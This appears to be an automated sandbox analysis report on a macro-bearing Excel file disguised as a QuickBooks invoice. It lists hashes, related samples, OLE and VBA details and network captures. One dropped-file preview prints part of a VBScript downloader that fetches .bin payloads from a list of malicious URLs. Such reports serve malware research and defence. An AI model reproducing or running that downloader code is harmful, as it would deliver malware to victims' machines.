	2aJ9QdIdFE.exe	Get hash	malicious	Browse	195.201.225.248
	EA4LughYnY.exe	Get hash	malicious	Browse	195.201.225.248
	Receipt-6218387.xls	Get hash	malicious	Browse	78.46.78.42
	etSPaoVcAD.exe	Get hash	malicious	Browse	195.201.225.248
	VwC7ZwYCLH.exe	Get hash	malicious	Browse	195.201.225.248
	BhAJLvq0c7.xls	Get hash	malicious	Browse	78.46.78.42
	kxQkjkU9DO.exe	Get hash	malicious	Browse	195.201.225.248
	PFx3G8Snzk.exe	Get hash	malicious	Browse	78.46.78.42
	9CMjcYFBxo.exe	Get hash	malicious	Browse	195.201.225.248
	jDnYtpTxyZ.exe	Get hash	malicious	Browse	88.99.66.31
	JvlwIeO09R.exe	Get hash	malicious	Browse	195.201.225.248
	9EP6Gxzv6F.xls	Get hash	malicious	Browse	78.46.78.42
	2ejCKSIjIV.exe	Get hash	malicious	Browse	78.46.78.42
	SMIym2zwaL.exe	Get hash	malicious	Browse	116.202.183.50
	KHK8O5BT50.exe	Get hash	malicious	Browse	88.99.66.31
	bQWApID6av.xls	Get hash	malicious	Browse	78.46.78.42
	pEIro35JRJ.exe	Get hash	malicious	Browse	195.201.225.248
	KHK8O5BT50.exe	Get hash	malicious	Browse	88.99.66.31
	AEdU8eJHgN.exe	Get hash	malicious	Browse	195.201.225.248
CLEAR-RATE-COMMUNICATIONSUS	BhAJLvq0c7.xls	Get hash	malicious	Browse	208.83.69.35
CLEAR-RATE-COMMUNICATIONSUS	bQWApID6av.xls	Get hash	malicious	Browse	208.83.69.35

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\qDialogMainChartType.exe Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	167936
Entropy (8bit):	7.4919139330417055
Encrypted:	false
SSDEEP:	3072:hWiJzQu5JD9ko9WY1wzxWrPAEN87L5cWlvsRwmhnxONgkf:hLquAkPAE+X5WncNgk
MD5:	EA91555829C1DFDFD47709496461C5D6
SHA1:	801A1C4AB318D6E7168208315991E68CF9991A09
SHA-256:	9FFE349BFCAAC3CEFFBBB5ACCF85814B0E08D204A02B63A9DF9681235A464ECC
SHA-512:	F8856CFD16D5BE0295CDDDBCF5808E38C781C73A8266A97A1AFF8FA2450B36C28DF5E841BF20F596AE27B686A4D2CC5DC7918B330E04B92CB4FDCBECE1AE265B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..........................................................Rich............PE..L......`.................@...P.......>.......P............................................@..........................R..]....R..h....... ............................Q..8............................................P...............................text....8.......@.................. ..`.rdata.......P.......P..............@..@.data...X....`.......`..............@....rsrc................p..............@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\qRangeAutoFormatLocalFormat3.sct Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5621
Entropy (8bit):	4.787304123915109
Encrypted:	false
SSDEEP:	96:CgAe+y62lIJ62lIAh62lIu62lInv62lIyHJyhn62lIr:hxlIvlIMlIOlInllIwyhtlIr
MD5:	E89821BB7E096EEB132D68B2A6676C11
SHA1:	BA823128686693A41A2B5654C5C98D5E2C67D237
SHA-256:	F42045365D89DE42726C7CA059AC19FE456EDE3F75DD7E402316C0491358DB63
SHA-512:	B26AE3BD30E3240F597823EE3EA29705EF658797D3B0B1760DEB71E53DAF9C7B06B58712EA9EDAE954B785007FF9344CFF926506774489E5868A6A5CEBD43A14
Malicious:	true
Reputation:	low
Preview:	<!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="Test"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">......<script type="text/vbscript" LANGUAGE="VBScript" >..On Error Resume Next..For Each qDialogWorkbookCopy in Array("http://onlinefastsolutions.com:8088/tpls/file3.bin","http://onlinefastsolutions.com:8088/images/details.bin","http://fasteasyupdates.com:8088/vendors/file4.bin","http://onlinefastsolutions.com:8088/js/file1.bin","http://buyer-remindment.com:8088/fonts/file8.bin","http://buyer-remindment.com:8088/css/file7.bin","http://onlinefastsolutions.com:8088/images/file13.bin","http://insiderushings.com:8088/js/file13.bin","http://buyer-remindment.com:8088/tpls/file4.bin","http://paymentadvisry.com:8088/wp-theme/file7.bin").. Set qDialogWorkspace = createobject("MSXML2.ServerXMLHTTP.6.0").. 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred ci

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Invoice 720710 from Quickbooks, LLC, Author: Quickbooks, LLC, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jul 14 09:38:23 2021, Last Saved Time/Date: Wed Jul 14 15:06:14 2021, Security: 0
Entropy (8bit):	7.524113368644345
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	4TWEQh2HJb.xls
File size:	728064
MD5:	40425d09e54ff26289dd074649f0cad9
SHA1:	ae7e4df26092d9acf01b732c8144f0170ccc6556
SHA256:	6f8f1b26324ea0f3f566fbdcb4a61eb92d054ccf0300c52b3549c774056b8f02
SHA512:	db62ee5908d05d96ca63a852880f79b8ad584d4d7490543e50801d2dcdbb62faab3f311263b14e0ce6e0f6d349be94953dd0d532992739ca71684ad7f4f8dfb7
SSDEEP:	12288:IRYbXrlUc6XS/CwRl+4MW1H5onZHBDznxcp/c0UGtkbByxlFYd2Drpkk:LUc6EjDMW1UrDjxcNcfgZI2
File Content Preview:	........................>...................................z...................b.......d.......f.......h.......j..............................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "4TWEQh2HJb.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:	Invoice 720710 from Quickbooks, LLC
Author:	Quickbooks, LLC
Last Saved By:	user
Create Time:	2021-07-14 08:38:23
Last Saved Time:	2021-07-14 14:06:14
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:	Quickbooks, LLC
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e2 0d f0 79 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 2109

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	2109
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 ef 05 00 00 00 00 00 00 01 00 00 00 e2 0d 10 70 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
qHundredMillions.Value
qHundredMillions
VB_Name
VB_Creatable
"ThisWorkbook"
VB_Exposed
CreateObject("Wscript.Shell")
qLine.Write
qLine.Close
qLine
VB_Customizable
CreateObject("Scripting.FileSystemObject")
.CreateTextFile(Environ("ALLUSERSPROFILE")
qUnlockedCells
(qUnlockedCells)
VB_Base
WorkBook_Open()
Environ("ALLUSERSPROFILE")
VB_TemplateDerived
False
.Exec
Attribute
Chr(qHundredMillions.Value)
VB_PredeclaredId
("mshta
VB_GlobalNameSpace

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375193
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 256

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	256
Entropy:	3.03601128578
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q u i c k b o o k s , L L C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 70 00 00 00 0b 00 00 00 78 00 00 00 10 00 00 00 80 00 00 00 13 00 00 00 88 00 00 00 16 00 00 00 90 00 00 00 0d 00 00 00 98 00 00 00 0c 00 00 00 ab 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 268

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	268
Entropy:	4.0356183074
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . I n v o i c e 7 2 0 7 1 0 f r o m Q u i c k b o o k s , L L C . . . . . . . . . Q u i c k b o o k s , L L C . . . . . . . . . u s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ) . . . x . . @ . . . . . . h
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 dc 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 02 00 00 00 50 00 00 00 04 00 00 00 7c 00 00 00 08 00 00 00 94 00 00 00 12 00 00 00 a4 00 00 00 0c 00 00 00 bc 00 00 00 0d 00 00 00 c8 00 00 00 13 00 00 00 d4 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 711057

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	711057
Entropy:	7.56836681766
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . u s e r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . ^ . " 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 75 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 422

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	422
Entropy:	5.30451258671
Base64 Encoded:	True
Data ASCII:	I D = " { 5 1 9 F 3 9 B 8 - 0 0 7 3 - 4 D 4 C - B 6 E 0 - 1 A C 8 3 6 5 4 5 9 7 B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 6 3 4 F 5 C 1 1 D C 1 5 7 C 5 5 7 C 5 5 7 C 5 5 7 C 5 " . . D P B = " 6 C 6 E A F 0 7 D 3 3 C D 4 3 C D 4 3 C " . . G C = " A 2 A 0 6 1 5 5 9 6
Data Raw:	49 44 3d 22 7b 35 31 39 46 33 39 42 38 2d 30 30 37 33 2d 34 44 34 43 2d 42 36 45 30 2d 31 41 43 38 33 36 35 34 35 39 37 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	62
Entropy:	3.05546715432
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2623

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2623
Entropy:	4.14656415449
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 515

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	515
Entropy:	6.30596515268
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . d . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ s y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 ff b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fd 64 e5 62 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 14, 2021 20:00:06.329454899 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.454039097 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.454212904 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.454802990 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.575582027 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.811981916 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812005997 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812019110 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812030077 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.812164068 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.929562092 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929584980 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929596901 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929609060 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929630995 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.929754972 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.929763079 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932425022 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932456017 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932493925 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932562113 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.932615042 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932631016 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932646990 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932660103 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.932683945 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.932722092 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:06.932755947 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:06.933494091 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050087929 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050106049 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050118923 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050187111 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050225019 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050265074 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050270081 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050606012 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050657988 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.050843000 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.050965071 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.051048994 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.051079035 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.051099062 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.051136017 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.051177979 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.052927017 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.052943945 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053004026 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053020954 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053076982 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053106070 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053117037 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053123951 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053144932 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053164005 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053164959 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053181887 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053203106 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053203106 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053240061 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053251982 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053277016 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053335905 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053375959 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053395987 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.053500891 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.053865910 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.164964914 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165010929 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165023088 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165040016 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.165179014 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.170593977 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170614958 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170629025 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170681953 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170753956 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170792103 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.170800924 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170818090 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170850039 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.170871019 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.170905113 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170922995 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170984030 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171011925 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171083927 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171101093 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171128988 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171358109 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171375990 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171418905 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171428919 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171504021 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171545029 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171586990 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171628952 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171633005 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171658039 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171700001 CEST	49165	8088	192.168.2.22	208.83.69.35

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 14, 2021 20:00:06.259974957 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 14, 2021 20:00:06.286272049 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 14, 2021 20:00:06.303292990 CEST	53099	53	192.168.2.22	8.8.8.8
Jul 14, 2021 20:00:06.327779055 CEST	53	53099	8.8.8.8	192.168.2.22

DNS Queries

